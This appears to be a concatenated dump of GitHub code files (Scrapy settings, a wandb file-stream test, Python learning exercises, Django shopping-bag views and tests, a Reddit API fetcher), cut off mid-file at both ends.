default)\n#COOKIES_ENABLED = False\n\n# Disable Telnet Console (enabled by default)\n#TELNETCONSOLE_ENABLED = False\n\n# Override the default request headers:\n#DEFAULT_REQUEST_HEADERS = {\n# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n# 'Accept-Language': 'en',\n#}\n\n# Enable or disable spider middlewares\n# See https://docs.scrapy.org/en/latest/topics/spider-middleware.html\n#SPIDER_MIDDLEWARES = {\n# 'harvem.middlewares.HarvemSpiderMiddleware': 543,\n#}\n\n# Enable or disable downloader middlewares\n# See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html\n#DOWNLOADER_MIDDLEWARES = {\n# 'harvem.middlewares.HarvemDownloaderMiddleware': 543,\n#}\n\n# Enable or disable extensions\n# See https://docs.scrapy.org/en/latest/topics/extensions.html\n#EXTENSIONS = {\n# 'scrapy.extensions.telnet.TelnetConsole': None,\n#}\n\n# Configure item pipelines\n# See https://docs.scrapy.org/en/latest/topics/item-pipeline.html\nITEM_PIPELINES = {\n 'harvem.pipelines.DuplicatesPipeline': 300,\n}\n\n# Enable and configure the AutoThrottle extension (disabled by default)\n# See https://docs.scrapy.org/en/latest/topics/autothrottle.html\n#AUTOTHROTTLE_ENABLED = True\n# The initial download delay\n#AUTOTHROTTLE_START_DELAY = 5\n# The maximum download delay to be set in case of high latencies\n#AUTOTHROTTLE_MAX_DELAY = 60\n# The average number of requests Scrapy should be sending in parallel to\n# each remote server\n#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0\n# Enable showing throttling stats for every response received:\n#AUTOTHROTTLE_DEBUG = False\n\n# Enable and configure HTTP caching (disabled by default)\n# See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings\n#HTTPCACHE_ENABLED = True\n#HTTPCACHE_EXPIRATION_SECS = 0\n#HTTPCACHE_DIR = 'httpcache'\n#HTTPCACHE_IGNORE_HTTP_CODES = []\n#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'\n\n\"\"\" >>> harvem/spiderclasses.py\nSPLASH_URL = 'http://0.0.0.0:8050'\nDOWNLOADER_MIDDLEWARES = {\n 
'harvem.middlewares.JustDelayMiddleware': 543,\n 'scrapy_splash.SplashCookiesMiddleware': 723,\n 'scrapy_splash.SplashMiddleware': 725,\n 'scrapy.downloadermiddlewares.httpcompression.HttpCompressionMiddleware': 810,\n}\nSPIDER_MIDDLEWARES = {\n 'scrapy_splash.SplashDeduplicateArgsMiddleware': 100,\n}\nDUPEFILTER_CLASS = 'scrapy_splash.SplashAwareDupeFilter'\nHTTPCACHE_STORAGE = 'scrapy_splash.SplashAwareFSCacheStorage'\n\"\"\"\n\n","repo_name":"p371k9/harvem","sub_path":"harvem/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8395230051","text":"import itertools\nimport os\nimport random\nimport string\nfrom dataclasses import dataclass\n\nfrom wandb import util\nfrom wandb.sdk.internal.file_stream import CRDedupeFilePolicy\nfrom wandb.sdk.lib.file_stream_utils import split_files\n\n\n@dataclass\nclass Chunk:\n data: str = None\n\n\ndef test_split_files():\n def choices(pop, k=1):\n # Note: random.choices was added in python 3.6\n return [random.choice(pop) for _ in range(k)]\n\n def rand_string_list(size):\n width = max(1, int(size / 10))\n num_lines = int(size / width)\n return [\n \"\".join(\n choices(\n string.ascii_letters\n + string.punctuation\n + string.digits\n + string.whitespace,\n k=random.randint(1, width),\n )\n )\n for _ in range(num_lines)\n ]\n\n file_size = 1 # MB\n num_files = 10\n chunk_size = 0.1 # MB\n files = {\n \"file_%s.txt\"\n % i: {\"content\": rand_string_list(int(file_size * 1024 * 1024)), \"offset\": 0}\n for i in range(num_files)\n }\n chunks = list(split_files(files, max_bytes=chunk_size * 1024 * 1024))\n\n # re-combine chunks\n buff = {}\n for c in chunks:\n for k, v in c.items():\n if k in buff:\n buff[k].append(v)\n else:\n buff[k] = [v]\n files2 = {\n k: {\n \"content\": list(\n itertools.chain(\n *(c[\"content\"] for c in sorted(v, key=lambda c: c[\"offset\"]))\n )\n ),\n \"offset\": 0,\n }\n for k, v in buff.items()\n }\n assert files == files2\n\n # Verify chunk offsets (These can be messed up and above assertion would still pass).\n for fname in files:\n offset_size_pairs = [\n (c[fname][\"offset\"], len(c[fname][\"content\"])) for c in chunks if fname in c\n ]\n offset_size_pairs.sort(key=lambda p: p[0])\n assert offset_size_pairs[0][0] == 0\n for i in range(len(offset_size_pairs) - 1):\n assert offset_size_pairs[i + 1][0] == sum(offset_size_pairs[i])\n assert sum(offset_size_pairs[-1]) == len(files[fname][\"content\"])\n\n\ndef test_crdedupe_consecutive_offsets():\n fp = CRDedupeFilePolicy()\n console = {1: \"a\", 2: \"a\", 3: \"a\", 8: \"a\", 12: \"a\", 13: \"a\", 30: \"a\"}\n intervals = fp.get_consecutive_offsets(console)\n print(intervals)\n assert intervals == [[1, 3], [8, 8], [12, 13], [30, 30]]\n\n\ndef test_crdedupe_split_chunk():\n fp = CRDedupeFilePolicy()\n answer = [\n (\"2020-08-25T20:38:36.895321 \", \"this is my line of text\\nsecond line\\n\"),\n (\"ERROR 2020-08-25T20:38:36.895321 \", \"this is my line of text\\nsecond line\\n\"),\n ]\n test_data = [\n \"2020-08-25T20:38:36.895321 this is my line of text\\nsecond line\\n\",\n \"ERROR 2020-08-25T20:38:36.895321 this is my line of text\\nsecond line\\n\",\n ]\n for i, data in enumerate(test_data):\n c = Chunk(data=data)\n prefix, rest = fp.split_chunk(c)\n assert prefix == answer[i][0]\n assert rest == answer[i][1]\n\n\ndef test_crdedupe_process_chunks():\n fp = CRDedupeFilePolicy()\n sep = os.linesep\n files = {\"output.log\": None}\n\n # 
Test STDERR progress bar updates (\\r lines) overwrite the correct offset.\n # Test STDOUT and STDERR normal messages get appended correctly.\n chunks = [\n Chunk(data=f\"timestamp text{sep}\"),\n Chunk(data=f\"ERROR timestamp error message{sep}\"),\n Chunk(data=f\"ERROR timestamp progress bar{sep}\"),\n Chunk(data=f\"ERROR timestamp \\rprogress bar update 1{sep}\"),\n Chunk(data=f\"ERROR timestamp \\rprogress bar update 2{sep}\"),\n Chunk(data=f\"timestamp text{sep}text{sep}text{sep}\"),\n Chunk(data=f\"ERROR timestamp error message{sep}\"),\n ]\n ret = fp.process_chunks(chunks)\n want = [\n {\n \"offset\": 0,\n \"content\": [\n \"timestamp text\\n\",\n \"ERROR timestamp error message\\n\",\n \"ERROR timestamp progress bar update 2\\n\",\n \"timestamp text\\n\",\n \"timestamp text\\n\",\n \"timestamp text\\n\",\n \"ERROR timestamp error message\\n\",\n ],\n }\n ]\n print(f\"\\n{ret}\")\n print(want)\n assert ret == want\n files[\"output.log\"] = ret\n file_requests = list(split_files(files, max_bytes=util.MAX_LINE_BYTES))\n assert 1 == len(file_requests)\n\n # Test that STDERR progress bar updates in next list of chunks still\n # maps to the correct offset.\n # Test that we can handle STDOUT progress bars (\\r lines) as well.\n chunks = [\n Chunk(data=f\"ERROR timestamp \\rprogress bar update 3{sep}\"),\n Chunk(data=f\"ERROR timestamp \\rprogress bar update 4{sep}\"),\n Chunk(data=f\"timestamp \\rstdout progress bar{sep}\"),\n Chunk(data=f\"timestamp text{sep}\"),\n Chunk(data=f\"timestamp \\rstdout progress bar update{sep}\"),\n ]\n ret = fp.process_chunks(chunks)\n want = [\n {\"offset\": 2, \"content\": [\"ERROR timestamp progress bar update 4\\n\"]},\n {\"offset\": 5, \"content\": [\"timestamp stdout progress bar update\\n\"]},\n {\"offset\": 7, \"content\": [\"timestamp text\\n\"]},\n ]\n print(f\"\\n{ret}\")\n print(want)\n assert ret == want\n files[\"output.log\"] = ret\n file_requests = list(split_files(files, max_bytes=util.MAX_LINE_BYTES))\n assert 3 == len(file_requests)\n\n # Test that code handles final progress bar output and correctly\n # offsets any new progress bars.\n chunks = [\n Chunk(data=f\"timestamp text{sep}\"),\n Chunk(data=f\"ERROR timestamp \\rprogress bar final{sep}text{sep}text{sep}\"),\n Chunk(data=f\"ERROR timestamp error message{sep}\"),\n Chunk(data=f\"ERROR timestamp new progress bar{sep}\"),\n Chunk(data=f\"ERROR timestamp \\rnew progress bar update 1{sep}\"),\n ]\n ret = fp.process_chunks(chunks)\n want = [\n {\"offset\": 2, \"content\": [\"ERROR timestamp progress bar final\\n\"]},\n {\n \"offset\": 8,\n \"content\": [\n \"timestamp text\\n\",\n \"ERROR timestamp text\\n\",\n \"ERROR timestamp text\\n\",\n \"ERROR timestamp error message\\n\",\n \"ERROR timestamp new progress bar update 1\\n\",\n ],\n },\n ]\n print(f\"\\n{ret}\")\n print(want)\n assert ret == want\n files[\"output.log\"] = ret\n file_requests = list(split_files(files, max_bytes=util.MAX_LINE_BYTES))\n assert 2 == len(file_requests)\n","repo_name":"wandb/wandb","sub_path":"tests/pytest_tests/unit_tests/test_file_stream.py","file_name":"test_file_stream.py","file_ext":"py","file_size_in_byte":6605,"program_lang":"python","lang":"en","doc_type":"code","stars":7479,"dataset":"github-code","pt":"37"} +{"seq_id":"41097559891","text":"# Задание 1. Создаем три переменные с одинак. 
данными и одинаковыми\n# идентификаторами (для начала возьмем целые числа)\nvar_int_1 = 10\nvar_int_2 = 10\nvar_int_3 = 10\nprint(id(var_int_1), id(var_int_2), id(var_int_3), sep='\\n', end='\\n\\n')\n\nvar_str_1, var_str_2, var_str_3 = 'string', 'string', 'string'\nprint(id(var_str_1), id(var_str_2), id(var_str_3), sep='\\n', end='\\n\\n')\n\nvar_float_1, var_float_2, var_float_3 = 8.31, 8.31, 8.31\nprint(id(var_float_1), id(var_float_2), id(var_float_3), sep='\\n', end='\\n\\n')\n\nvar_tuple_1, var_tuple_2 = (1, 2, 3, 4, 5), (1, 2, 3, 4, 5)\nvar_tuple_3 = (1, 2, 3, 4, 5)\nprint(id(var_tuple_1), id(var_tuple_2), id(var_tuple_3), sep='\\n', end='\\n\\n')\n\n# Задание 2. Создаём две переменные с одинаковыми данными и разными id.\nvariable_list_1 = [1, 2, 3, 4, 5]\nvariable_list_2 = [1, 2, 3, 4, 5]\nprint(id(variable_list_1), id(variable_list_2), sep='\\n', end='\\n\\n')\n\n# Задание 3. Чтобы переменные из Задания 1 имели разные id (и одинак. содерж.)\nvar_tuple_1_list = list(var_tuple_1)\nvar_tuple_2_list = list(var_tuple_2)\nvar_tuple_3_list = list(var_tuple_3)\nprint(id(var_tuple_1_list), id(var_tuple_2_list), id(var_tuple_3_list),\n      sep='\\n', end='\\n\\n')\n\nvariable_list_1_tuple = tuple([1, 2, 3, 4, 5])\nvariable_list_2_tuple = tuple([1, 2, 3, 4, 5])\nprint(variable_list_1_tuple, variable_list_2_tuple)\nprint(id(variable_list_1_tuple), id(variable_list_2_tuple), sep='\\n')\nmy_set1, my_set2 = {1, 2, 3, 4}, {1, 2, 3, 4}\nfroz_my_set1 = frozenset(my_set1)\nfroz_my_set2 = frozenset(my_set2)\nprint(froz_my_set1, froz_my_set2)\nprint(id(froz_my_set1), id(froz_my_set2), end='\\n\\n')\n\nmy_list_1 = ['1']\nmy_list_2 = ['1']\nprint(type(my_list_1), id(my_list_1))\nprint(type(my_list_2), id(my_list_2))\nmy_str_1 = str(my_list_1)\nmy_str_2 = str(my_list_2)\nprint(my_str_1, type(my_str_1), id(my_str_1), sep='--')\nprint(my_str_2, type(my_str_2), id(my_str_2), sep='--')\n\nmy_bool_1 = bool(my_list_1)\nmy_bool_2 = bool(my_list_2)\nprint(my_bool_1, type(my_bool_1), id(my_bool_1), sep='--')\nprint(my_bool_2, type(my_bool_2), id(my_bool_2), sep='--')\n","repo_name":"Kosalexx/Project_1","sub_path":"lesson_4/exercises_1-3.py","file_name":"exercises_1-3.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29484937648","text":"# -*- coding: UTF-8 -*-\n\n# 11、简述面向对象中__new__和__init__区别,\n'''\n__init__ : 初始化方法, 创建对象后就默认被调用了, 可以传参数\n1、__new__至少要有一个参数cls,代表当前类,此参数在实例化时由Python解释器自动识别\n\n2、__new__必须要有返回值,返回实例化出来的实例,这点在自己实现__new__时要特别注意,\n可以return父类(通过super(当前类名, cls))__new__出来的实例,或者直接是object的__new__出来的实例\n\n3、__init__有一个参数self,就是这个__new__返回的实例,__init__在__new__的基础上可以完成一些其它初始化的动作,__init__不需要返回值\n\n4、如果__new__创建的是当前类的实例,会自动调用__init__函数,通过return语句里面调用的__new__函数的第一个参数是cls来保证是当前类实例,\n如果是其他类的类名,;那么实际创建返回的就是其他类的实例,其实就不会调用当前类的__init__函数,也不会调用其他类的__init__函数。\n\n'''\nimport random\n\n# import numpy as np\nimport re\n\n\nclass Foo(object):\n    def __init__(self, color, money):\n        self.color = color\n        self.money = money\n\n    def move(self):\n        print('running.........')\n\n\nferrari = Foo('red', '200w')\nlawse = Foo('black', '300w')\nprint('法拉利的颜色为:{},价格{}:'.format(ferrari.color, ferrari.money))\nprint('劳斯的颜色为:{},价格{}:'.format(lawse.color, lawse.money))\n\n\nclass Obj(object):\n    def __init__(self, name, age):\n        print('3__init__:', self) # 3__init__: <__main__.Obj object at 0x7f2e2e100240>\n        self.name = name\n        self.age = age\n\n    def __new__(cls, *args, **kwargs):\n        print('1_cls:', id(cls)) # 1_cls: 14915272\n        if not hasattr(cls, 
'_inst'):\n            cls._inst = super(Obj, cls).__new__(cls)\n        print('2__new__:', cls._inst) # 2__new__: <__main__.Obj object at 0x7f2e2e100240>\n        return cls._inst\n\n\na = Obj('zhangsan', 19)\n# b = Obj('lisi', 20)\nprint(a.name, a.age)\n# print(b.name, b.age)\nprint('4_Obj:', id(Obj)) # 4_Obj: 14915272\nprint('*'*60)\n\n\n# 12、简述with方法打开处理文件帮我们做了什么?\n\"\"\"\n打开文件在进行读写的时候可能会出现一些异常状况,如果按照常规的f.open\n\n写法,我们需要try,except,finally,做异常判断,并且文件最终不管遇到什么情况,\n都要执行finally f.close()关闭文件,with方法帮我们实现了finally中f.close\n\"\"\"\nf = open('./note.txt', 'w')\ntry:\n    f.write('hello world')\nexcept:\n    pass\nfinally:\n    f.close()\n\n# with open('./note2.txt', 'wb') as f2:\n#     f2.write('made in China')\n\n\n# 13、列表[1,2,3,4,5],请使用map()函数输出[1,4,9,16,25],并使用列表推导式提取出大于10的数,最终输出[16,25]\n# map()函数第一个参数是fun,第二个参数一般是list,第三个参数可以写list,也可以不写,根据需求\nli1 = [1, 2, 3, 4, 5]\n\n\ndef foo(x):\n    return x ** 2\n\n\nli2 = list(map(foo, li1))\nprint(li2) # [1, 4, 9, 16, 25]\nprint([x for x in li2 if x > 10]) # [16, 25]\nprint('='*60)\n\n\n# 14、python中生成随机整数、随机小数、0--1之间小数方法\nprint(random.randint(1, 3))\n# print(np.random.randn(5))\nprint(random.random()) # 0.23450313090215458\nprint('&'*60)\n\n\n# 15、避免转义给字符串加哪个字母表示原始字符串?\n# r , 表示需要原始字符串,不转义特殊字符\n\n\n# 16、re\nstr1 = '<div class=\"nam\">中国</div>'\nres = re.findall(r'<div class=\".*\">(.*?)</div>', str1) # .* 类名可有可无, () 提取\nprint(res)\nprint(\"%\"*60)\n\n\n# 17、python 断言方法\nn = 3\nassert(n > 1)\nprint('success') # 打印\n# assert(n < 2)\n# print('failure') # 不打印\n\n\n# 18、数据表student有id,name,score,city字段,其中name中的名字可有重复,需要消除重复行,请写sql语句\n# select distinct name from student;\n\n\n# 19、10个Linux常用命令\n# ls pwd cp mv tar zip unzip lsof grep top tree cat tail herf du cal ssh\n# touch mkdir sudo install version pip list cd more echo rm\n\n\n# 20、python2和python3区别?列举5个,\n# name = raw_input('')\n# print(name)\n# age = input('')\n# print(age)\n'''\n1、Python3 使用 print 必须要以小括号包裹打印内容,比如 print('hi')\n\nPython2 既可以使用带小括号的方式,也可以使用一个空格来分隔打印内容,比如 print 'hi'\n\n2、python2 range(1,10)返回列表,python3中返回迭代器,节约内存\n\n3、python2中使用ascii编码,python3中使用utf-8编码\n\n4、python2中unicode表示字符串序列,str表示字节序列\n\n   python3中str表示字符串序列,byte表示字节序列\n\n5、python2中为正常显示中文,引入coding声明,python3中不需要\n\n6、python2中是raw_input()函数,python3中是input()函数\n\n'''","repo_name":"13528770807/practice","sub_path":"qiang14_working2/q02_new_init.py","file_name":"q02_new_init.py","file_ext":"py","file_size_in_byte":4833,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29106150520","text":"def solve(nums, target):\n    dictionary = {}\n    for i in range(len(nums)):\n        dictionary[nums[i]] = i\n    print(dictionary)\n    for i in range(len(nums)):\n        a = nums[i]\n        b = target - a\n        print(\"gf\",a,b)\n        if b in dictionary:\n            print(a,b)\n            if (i-1) != dictionary[b]-1:\n                return [i, dictionary[b]]\n\nnums = [3,2,4]\ntarget = 6\nprint(solve(nums, target))","repo_name":"chithra-m/ds_code_snippets","sub_path":"leetcode/two_sum.py","file_name":"two_sum.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34096235023","text":"import sys\nfrom PyQt5.QtWidgets import QWidget,QApplication\nfrom ui_Widget import Ui_Widget\n\nclass QmyWidget(QWidget):\n    def __init__(self,parent=None):\n        super().__init__(parent)\n        self.ui = Ui_Widget()\n        self.ui.setupUi(self)\n\nif __name__ == '__main__':\n    app = QApplication(sys.argv)\n    myWidget = QmyWidget()\n    myWidget.show()\n    sys.exit(app.exec_())\n","repo_name":"emwzq/pyqt5_learning","sub_path":"Introduction/qt_res/appMain.py","file_name":"appMain.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72338444266","text":"#!/usr/bin/python3\n\"\"\"Queries the Reddit API and prints the titles of the first 10 hot posts.\"\"\"\nfrom requests import get\n\n\ndef top_ten(subreddit):\n    \"\"\"If not a valid subreddit, print None.\"\"\"\n    url = 'https://www.reddit.com/r/{}/hot.json?limit=10'.format(subreddit)\n    Agents = {'User-agent': 'Agent-Subscribe'}\n    Response = get(url, headers=Agents, allow_redirects=False)\n    if (Response.status_code != 200):\n        print('None')\n    else:\n        ChildTitles = Response.json()['data']['children']\n        for HotPosts in ChildTitles:\n            print(HotPosts['data']['title'])\n","repo_name":"747-diego/holberton-system_engineering-devops","sub_path":"0x16-api_advanced/1-top_ten.py","file_name":"1-top_ten.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26917832897","text":"from django.shortcuts import render, HttpResponse, redirect, get_object_or_404, reverse\nfrom products.models import Product, Variants\nfrom django.contrib import messages\n\n\n# Create your views here.\ndef 
view_bag(request):\n\n    return render(request, 'shopping_bag/shopping_bag.html')\n\n\ndef add_to_bag(request, item_id):\n\n    quantity = int(request.POST.get('quantity'))\n    redirect_url = request.POST.get('redirect_url')\n    bag = request.session.get('bag', {})\n\n    if item_id is None:\n        return HttpResponse('variant is none')\n    variant = get_object_or_404(Variants, pk=item_id)\n\n    if item_id in list(bag.keys()):\n        bag[item_id] += quantity\n        messages.success(request, f'{bag[item_id]} {variant.size} {variant.color} {variant.title}s are added to your bag.')\n    else:\n        bag[item_id] = quantity\n        messages.success(request, f'Added {variant.size} {variant.color} {variant.title} to your bag.')\n\n    request.session['bag'] = bag\n\n    return redirect(redirect_url)\n\n\ndef adjust_bag(request, item_id):\n\n    variant = get_object_or_404(Variants, pk=item_id)\n    quantity = int(request.POST.get('quantity'))\n    bag = request.session.get('bag', {})\n\n    if quantity > 0:\n        bag[item_id] = quantity\n        messages.success(request, f'Quantity of {variant.title} in your bag is now {quantity}.')\n    else:\n        bag.pop(item_id)\n        messages.success(request, f'{variant.title} successfully removed from your bag.')\n\n    request.session['bag'] = bag\n\n    return redirect(reverse('view_bag'))\n\n\ndef remove_from_bag(request, item_id):\n    try:\n        variant = get_object_or_404(Variants, pk=item_id)\n        bag = request.session.get('bag', {})\n        bag.pop(item_id)\n        messages.success(request, f'{variant.title} removed from bag.')\n        request.session['bag'] = bag\n        return HttpResponse(status=200)\n\n    except Exception as e:\n        messages.error(request, f'Error removing item: {e}')\n        return redirect(reverse('view_bag'))\n","repo_name":"ashur-k/RR-Clothes","sub_path":"shopping_bag/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22526101167","text":"\"\"\"\nGiven intervals for when meetings are taking place, find the earliest time \na new meeting of duration d can take place.\n\nmeetings = [[10, 50], [35, 70], [150, 170], [250, 300]]\n\nIf d = 80\nexpected: 70\nbecause the meeting of duration 80 can fit between 70 and 150.\n\nIf d = 10\nexpected: 0\nbecause the meeting of duration 10 can be placed as the first meeting. 
\n\nIf d = 500\nexpected: 300\nbecause the meeting of duration 500 can only go after the last meeting.\n\n\nmeetings = [[0,30], [10,20], [20,40],[60,80]]\n\n\"\"\"\n\ndef findEarliestTime(meetings, d):\n earliestTimeSoFar = 0\n\n i = 0\n n = meetings[i]\n if d <= n[0]:\n return earliestTimeSoFar\n\n while i < len(meetings)-1:\n currMeeting = meetings[i] \n nextMeeting = meetings[i+1]\n \n if currMeeting[1] + d <= nextMeeting[0]:\n earliestTimeSoFar = currMeeting[1]\n # print(\"earliestTimeSoFar updated: \", earliestTimeSoFar)\n\n i += 1\n\n if earliestTimeSoFar == 0:\n return meetings[-1][1]\n\n return earliestTimeSoFar\n\ndef test2():\n meetings = [[0,30], [10,20], [20,40],[60,80]]\n #d = 20 # expected res: 40\n #d = 10 # expected res: 40\n #d = 0 # expected res: 0 \n #d = 100 # expected res: 80\n #d = 30 # expected res: 80\n res = findEarliestTime(meetings, d)\n print(\"res: \", res)\n\ntest2()\n\ndef test():\n meetings = [[10, 30], [35, 70], [150, 170], [250, 300]]\n d = 10\n res = findEarliestTime(meetings, d)\n print(\"res:\" , res)\n\n#test()\n\n","repo_name":"mcxu/code-sandbox","sub_path":"PythonSandbox/src/misc/earliest_time_in_schedule.py","file_name":"earliest_time_in_schedule.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"73473978028","text":"from django import forms\nfrom django.contrib.auth import get_user_model\nfrom django.test import Client, TestCase\nfrom django.urls import reverse\nfrom django. core. cache import cache\n\nfrom posts.models import Group, Post, Follow\nfrom ..forms import PostForm\nfrom datetime import date\n\nUser = get_user_model()\n\n\nclass PostTests(TestCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n\n cls.user_creator = User.objects.create(username='user_cr')\n cls.user_uncreator = User.objects.create(username='user_un')\n cls.group = Group.objects.create(\n title='Заголовок для тестовой группы',\n slug='test_slug',\n description='Текст описания тестовой группы'\n )\n cls.post = Post.objects.create(\n text='Тестовая запись для создания нового поста',\n author=cls.user_creator,\n group=cls.group,\n pub_date=date.today()\n )\n cls.form_field = {\n 'text': forms.fields.CharField,\n 'group': forms.fields.ChoiceField\n }\n cls.posts = cls.post.author.posts.select_related('author')\n cls.cnt_posts = cls.post.author.posts.count()\n\n def setUp(self):\n self.guest_client = Client()\n self.user = User.objects.create_user(username='guest')\n self.post_creator = Client()\n self.post_creator.force_login(self.user_creator)\n self.authorized_client = Client()\n self.authorized_client.force_login(self.user_uncreator)\n\n def check_context_contains_page_or_post(self, context, post=False):\n if post:\n self.assertIn('post', context)\n post = context['post']\n else:\n self.assertIn('page', context)\n post = context['page'][0]\n self.assertEqual(post.author, PostTests.user_creator)\n self.assertEqual(post.pub_date, PostTests.post.pub_date)\n self.assertEqual(post.text, PostTests.post.text)\n self.assertEqual(post.group, PostTests.post.group)\n\n # def checking_correct_group(self, group):\n # self.assertEqual(self.group.title, group.title)\n # self.assertEqual(self.group.slug, group.slug)\n # self.assertEqual(self.group.description, group.description)\n\n def test_pages_uses_correct_template(self):\n \"\"\"URL-адрес использует соответствующий шаблон.\"\"\"\n templates_pages_names = {\n reverse(\n 'posts:index'\n ): 'posts/index.html',\n 
reverse(\n                'posts:posts', kwargs={'slug': self.group.slug}\n            ): 'posts/group_list.html',\n            reverse(\n                'posts:profile', kwargs={'username': self.post.author}\n            ): 'posts/profile.html',\n            reverse(\n                'posts:post_detail', kwargs={'post_id': self.post.pk}\n            ): 'posts/post_detail.html',\n            reverse(\n                'posts:post_create'\n            ): 'posts/post_create.html',\n            reverse(\n                'posts:post_edit', kwargs={'post_id': self.post.pk}\n            ): 'posts/post_create.html',\n        }\n\n        for reverse_name, template in templates_pages_names.items():\n            with self.subTest(reverse_name=reverse_name):\n                response = self.post_creator.get(reverse_name)\n                self.assertTemplateUsed(response, template)\n                if reverse_name == reverse(\n                    'posts:post_edit', kwargs={'post_id': self.post.pk}\n                ):\n                    self.assertRedirects(\n                        self.guest_client.get(reverse_name),\n                        '/auth/login/?next=%2Fposts%2F1%2Fedit%2F'\n                    )\n                elif reverse_name == reverse(\n                    'posts:post_create',\n                ):\n                    self.assertRedirects(\n                        self.guest_client.get(reverse_name),\n                        '/auth/login/?next=%2Fcreate%2F'\n                    )\n                else:\n                    self.assertTemplateUsed(\n                        self.guest_client.get(reverse_name),\n                        template\n                    )\n\n    def test_index_show_correct_context(self):\n        \"Список всех постов\"\n        response = self.authorized_client.get(reverse('posts:index'))\n        self.check_context_contains_page_or_post(response.context)\n\n    def test_grouplist_show_correct_context(self):\n        \"\"\"Список постов отфильтрованный по группе\"\"\"\n        response = self.authorized_client.get(reverse(\n            'posts:posts', kwargs={'slug': self.group.slug}\n        ))\n        self.check_context_contains_page_or_post(response.context.get('group'))\n        self.check_context_contains_page_or_post(\n            response.context['page_obj'][0], post=True\n        )\n\n    def test_profile_show_correct_context(self):\n        \"Список постов отфильтрованный по пользователю\"\n        response = self.authorized_client.get(reverse(\n            'posts:profile', kwargs={'username': self.post.author}\n        ))\n        self.check_context_contains_page_or_post(response.context)\n\n        self.assertIn('author', response.context)\n        self.assertEqual(response.context['author'], PostTests.user_creator)\n\n    def test_postdetail_show_correct_context(self):\n        \"\"\"Один пост, отфильтрованный по id\"\"\"\n        response = self.authorized_client.get(reverse(\n            'posts:post_detail', kwargs={'post_id': self.post.pk}\n        ))\n        self.check_context_contains_page_or_post(response.context, post=True)\n\n        self.assertIn('author', response.context)\n        self.assertEqual(response.context['author'], PostTests.user_creator)\n\n        self.assertIn('posts_count', response.context)\n        self.assertEqual(\n            response.context['posts_count'], PostTests.user_creator.posts.count()\n        )\n\n    def test_add_or_editpost_show_correct_context(self):\n        \"\"\"Форма редактирования поста, отфильтрованного по id\"\"\"\n        # Сначала проверка редактирования поста\n        response = self.post_creator.get(reverse(\n            'posts:post_edit',\n            kwargs={'post_id': self.post.pk}\n        ))\n\n        self.assertIn('form', response.context)\n        self.assertIsInstance(response.context['form'], PostForm)\n        self.assertIn('is_edit', response.context)\n        is_edit = response.context['is_edit']\n        self.assertIsInstance(is_edit, bool)\n        self.assertEqual(is_edit, True)\n\n        # Теперь доп.проверка создания поста\n        response = self.authorized_client.get(reverse('posts:post_create'))\n        is_edit = response.context['is_edit']\n        self.assertEqual(is_edit, False)\n\n        for value, expected in self.form_field.items():\n            with self.subTest(value=value):\n                form_field = response.context['form'].fields[value]\n                self.assertIsInstance(form_field, expected)\n\n\nclass PaginatorViewsTest(TestCase):\n    
@classmethod\n    def setUpClass(cls):\n        cls.user_auth = User.objects.create(username='auth')\n        super().setUpClass()\n        cls.group = Group.objects.create(\n            title='Тестовая группа',\n            slug='test_slug',\n            description='Текст описания тестовой группы'\n        )\n        cls.some_posts = [\n            Post(\n                author=cls.user_auth,\n                text=f'Тестовый пост{i}',\n                group=cls.group\n            )\n            for i in range(15)\n        ]\n        Post.objects.bulk_create(cls.some_posts)\n        cls.pages: tuple = (\n            reverse('posts:index'),\n            reverse('posts:profile',\n                    kwargs={'username': f'{cls.user_auth.username}'}),\n            reverse('posts:posts',\n                    kwargs={'slug': f'{cls.group.slug}'}))\n\n    def setUp(self):\n        self.not_authorized = Client()\n        self.unauthorized = Client()\n        self.authorized = Client()\n        self.authorized.force_login(self.user_auth)\n        cache.clear()\n\n    def test_correct_page_context_guest_client(self):\n        \"\"\"Проверка количества постов на страницах для гостя. \"\"\"\n        cache.clear()\n        for page in self.pages:\n            response_1page = self.not_authorized.get(page)\n            response_2page = self.not_authorized.get(page + '?page=2')\n            self.assertEqual(\n                len(response_1page.context.get('page_obj')), 10\n            )\n            self.assertEqual(\n                len(response_2page.context.get('page_obj')), 5\n            )\n            cache.clear()\n\n        pagination = {\n            1: 10,\n            2: 5\n        }\n\n        for page_number, count in pagination.items():\n            response = self.unauthorized.get(\n                reverse('posts:index'), {'page': page_number}\n            )\n            self.assertEqual(\n                len(response.context.get('page_obj')), count\n            )\n\n    def test_correct_page_context_auth_client(self):\n        \"\"\"Проверка количества постов на страницах для авторизованного.\"\"\"\n        cache.clear()\n        for page in self.pages:\n            response_1page = self.authorized.get(page)\n            response_2page = self.authorized.get(page + \"?page=2\")\n            self.assertEqual(\n                len(response_1page.context.get('page_obj')), 10\n            )\n            self.assertEqual(\n                len(response_2page.context.get('page_obj')), 5\n            )\n            cache.clear()\n\n\nclass CacheViewsTest(TestCase):\n    @classmethod\n    def setUpClass(cls):\n        super().setUpClass()\n        cls.author = User.objects.create_user(username='test_user')\n        cls.authorized_client = Client()\n        cls.authorized_client.force_login(cls.author)\n        cls.group = Group.objects.create(\n            